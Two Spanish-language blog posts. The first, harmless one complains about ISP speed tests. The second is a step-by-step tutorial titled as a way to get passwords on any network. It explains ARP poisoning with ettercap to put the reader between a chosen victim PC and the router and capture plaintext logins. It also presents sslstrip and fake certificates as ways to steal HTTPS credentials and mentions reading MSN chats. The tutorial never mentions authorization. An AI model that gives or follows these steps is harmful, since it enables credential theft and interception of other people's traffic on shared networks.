para q venden conexiones q no pueden dar?... en fin, veremos si c puede sacar algo d esto y sino... a cambiar d vuelta.

la pagina de telecentro para hacer test d velocidad es:

http://velocidad.telecentro.net.ar/

ahhh... el cable c v impecable, mucho mejor q cablevision y mas canales xD


Test de velocidad fiable

Los tests d velocidad d las paginas no son fiables xq no miden la velocidad en condiciones reales, el de telecentro es una mentira q jamas sale siquiera a internet, solo mide la velocidad dentro d su propia red... y aun asi no mide lo q deberia. esta sacado d la pagina q pongo a continuacion donde tienen 1 server propio. no digo q es 1 mentira x la medicion en si sino x las condiciones en q c hace.

para tener 1 medicion real tenemos q checkear contra servidores internacionales q es donde navegamos generalmente y d donde bajamos cosas o vemos videos. para hacer 1 medicion real vamos a esta pagina:

http://www.speedtest.net/

este es mi resultado en telecentro 1 sabado a la tarde... y dio bastante bien (ni comento el ping d 158ms en mi propia red...):

con esta conexion, baje d donde sea no voy a pasar los 2.1mbps en el mejor d los casos. la velocidad a miami.fl, usa x ej:

y a 1 server en leipzig, deutschland:

bastante lejos d lo prometido no? para hacer el test simplemente tienen q pinchar en uno d los servers y esperar q la pagina haga el resto.

al terminar provee d 1 link en la parte inferior junto con los resultados, haciendo click en "copy direct link" c carga en el portapapeles. este link es aceptado como un test valido para gran cantidad d instituciones a nivel internacional y es muy fiable.


Conclusion

todos los isps van a tratar d darles lo minimo posible, lo ideal es checkear q este todo ok y en caso d q no reclamar 1ero a ellos, si no solucionan el problema directamente a la CNC. en una entrada anterior hay algo d info d donde y como hacer la denuncia y les aseguro q da resultados, pueden verla aca:

|_ocutus&CNDC vs Samsung y |_ocutus&CNC vs Telefonica

16.5.10

packet sniffing... o como conseguir passwords (y otras cosas) en cualquier red.

habia prometido hace unos meses 1 articulo sobre arp poisoning en la practica (ARP Poisoning), esto x supuesto llevo a agregar algo d sniffing y el sniffing a otras cosas asi q decidi dividirlo en varias entradas para mantener el orden y no hacerlo tan largo.

c recomienda leer el articulo anterior para tener idea d lo q estan haciendo y d esa forma poder desarrollar otro tipo d tecnicas asi como tener la posibilidad d usar cualquier soft q quieran ya q sabiendo el proceso c puede hacer d muchas maneras distintas.

este metodo es aplicable en cualquier red lan, no importa si tiene 2 o 2000 maquinas, no importa si son win o linux, si es cableada o wifi, si usan firefox, ie, opera o lo q sea... no importa casi nada, salvo q tengamos nuestra maquina conectada a la red.


packet sniffing

tambien llamado packet analysis es el proceso de capturar trafico de la red y analizarlo. aunque normalmente es asociado con actividades "hacker" el analisis d paquetes es una herramienta valiosisima para cualquier admin d redes, util para diagnosticar problemas q haya en la misma, asi como tambien detectar cualquier tipo d ataque, anomalia o hasta algun user q consume demasiado trafico... ;)

el trafico de red, como todos sabemos (o deberiamos saber si queremos hacer estas cosas), se divide en paquetes q cumplen distintas funciones. en la entrada anterior hablamos de los paquetes arp pero hay muchas otras clases. como seria 1 tema muy extenso (tal vez 1 futura entrada en el blog) dejo una animacion muuuyyy facil d entender para los q no tienen idea. la mayoria es aplicable, salvo algunas cosas en desuso como el viejo "ping d la muerte"...

entonces todo lo q tenemos q hacer es usar 1 sniffer para capturar s trafico y ver lo q nos interesa. con la tecnica del arp poisoning vimos q podemos engañar a 1 maquina para q crea q nosotros somos el router y al router para q crea q somos esa maquina, d esta forma nos "paramos" entre medio d las dos y realizamos el ataque llamado Man In The Middle (MITM). pero antes algunas aclaraciones.


verdades y mitos

la red esta llena d personitas preguntando "como hackear passwords de hotmail" y lleno d otras tantas q ponen tutos en los q hacen 1 simple envenenamiento y activan el sniffer mostrando resultados con passwords d hotmail, gmail, yahoo, etc. lo cierto es q c puede hacer, pero no es tan facil y se requiere hacer alguna cosa mas.

las passwords no c transmiten todas del mismo modo, no es lo mismo el login d 1 ftp q el d hotmail x ej donde entra en juego encriptacion ssl, intercambio d certificados, etc., para ver s tipo d contraseñas necesitamos hacer algun paso adicional.

hasta no hace mucho la tecnica acostumbrada era enviar al navegador 1 certificado falso, el cual muestra el tipico mensaje d q el certificado no es valido. como el 90% (si no mas) d los users simplemente lo aceptan y siguen su camino c podria decir q tiene bastante efectividad...

sin embargo el año pasado c presento en el black hat dc 2009 la tecnica llamada sslstrip. lo q hace basicamente es reescribir todos los links https a http, despues reconstruye las urls con 1 certificado valido y redirige la conexion hacia su destino original despues d quedarse con los datos... sin alertas, sin llamar la atencion d nadie... perfecto xD


sniffing/poisoning basico

como dije q era practica dejo las explicaciones d lado y vamos a ver el tipico tuto d ettercap (sin errores ni omisiones) q sirve para capturar passwords en texto plano. esto es ftp, telnet, foros e infinidad d paginas, sitios e intranets q no usan encriptacion en los logins.

hay versiones d ettercap tanto para win como para linux, obviamente c recomienda linux para este tipo d "actividades". la instalacion del programa no tiene demasiadas complicaciones. para win c puede descargar d aca (la version q dice win32.exe):

http://sourceforge.net/projects/ettercap/files/

en linux desde el gestor d paquetes o:

http://ettercap.sourceforge.net/download.php

en win abre directamente en modo grafico en linux desde la consola en modo root (o con sudo) ejecutar "ettercap -G".

c abre la ventana del programa, seleccionamos el menu SNIFF -> UNIFIED SNIFFING...

se abre la ventana d seleccion del dispositivo d entrada, en mi caso ath0, si estuviera en red cableada seria el eth0... simplemente seleccionen su dispositivo conectado a la red.

cambia el menu superior, seleccionamos HOSTS -> SCAN FOR HOSTS...

esto corre 1 scanneo en la red para ver q hay conectado...

hacemos click en HOSTS -> HOSTS LIST en este caso salen 3 ips. 2 son pcs conectadas a la red y la 3era el router. lo q tenemos q saber es cual es la ip del router y la de la pc a envenenar.

para saber cual es el router en windows hacemos 1 ipconfig desde la consola y la ultima linea (gateway o "puerta d enlace predeterminada") es la ip del router.

en linux, desde la consola "ip route show" y sale tambien en la ultima linea (default via).

la maquina a envenenar ya deberian saberla o averiguarla, para eso c puede usar 1 scanner o simples ping -a en win para saber el nombre, nbtstat, etc. mmblookup, dig o lo q sea en linux.

en este caso el router es el 192.168.0.254 y la pc a envenenar la 192.168.0.101. seleccionamos la 254 y hacemos click en "add to target 1", despues seleccionamos la 101 y hacemos click en "add to target 2". en la consola inferior del programa se ve el log con los cambios que vamos haciendo.

seleccionamos el menu MITM -> ARP POISONING y en la ventana q sale checkeamos "SNIFF REMOTE CONNECTIONS" y aceptar.

ya esta corriendo el envenenamiento, d manera q todo el trafico entre 101 y 254 pasa por nosotros, ahora queda activar el sniffer para capturar. menu START -> START SNIFFING

solo queda esperar a q alguien meta 1 password para q salga en la parte inferior.

este metodo como dije solo sirve para contraseñas de texto plano, en la proxima entrada voy a poner el uso practico de certificados falsos y d sslstrip combinados con esto.

ahhh... las conversaciones d msn viajan en texto plano x si a alguien le interesa, activando ettercap junto con wireshark c pueden ver... tal vez lo explique con mas detalle tambien en el futuro pero no c si vale la pena 1 entrada... es bastante facil agregandolo a lo anterior ;)